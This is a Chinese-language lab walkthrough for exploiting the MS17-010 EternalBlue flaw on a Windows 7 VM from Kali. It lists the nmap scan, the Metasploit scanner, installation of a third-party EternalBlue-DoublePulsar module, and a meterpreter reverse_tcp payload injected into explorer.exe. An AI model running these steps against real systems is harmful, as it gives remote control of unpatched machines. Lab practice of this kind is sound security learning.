環境
靶機: win7 32位 ip 192.168.206.129
攻擊機: kali ip 192.168.206.128
運行環境:VMware
工具: FinalShell
信息收集
nmap -sS -sV -Pn 192.168.206.129
發現端口445可以進行測試
進入msf6命令
msfconsole
檢測系統是否有漏洞
先使用use auxiliary/scanner/smb/smb_ms17_010模塊進行分析
use auxiliary/scanner/smb/smb_ms17_010
顯示系統存在漏洞系統為win7 32位
下載模塊
kali沒有32位的利用模塊 下載地址 將下載下來的Eternalblue-Doublepulsar-Metasploit-master的名字改為Eternalblue-Doublepulsar-Metasploit並將改完名后的整個目錄復制到root目錄下(需要解壓2次,把最后一次解壓名改為Eternalblue-Doublepulsar-Metasploit 並放到/root目錄下)
將eternalblue_doublepulsar.rb 拷貝到/usr/share/metasploit-framework/modules/exploits/windows/smb目錄下
cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb
安裝框架
wine -h
發現找不到再運行
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
最后測試
使用use exploit/windows/smb/eternalblue_doublepulsar進行測試
use exploit/windows/smb/eternalblue_doublepulsar
設置攻擊模塊
set payload windows/meterpreter/reverse_tcp
繼續設置
set processinject explorer.exe
測試完成
參考
https://blog.csdn.net/qq_41617034/article/details/91051614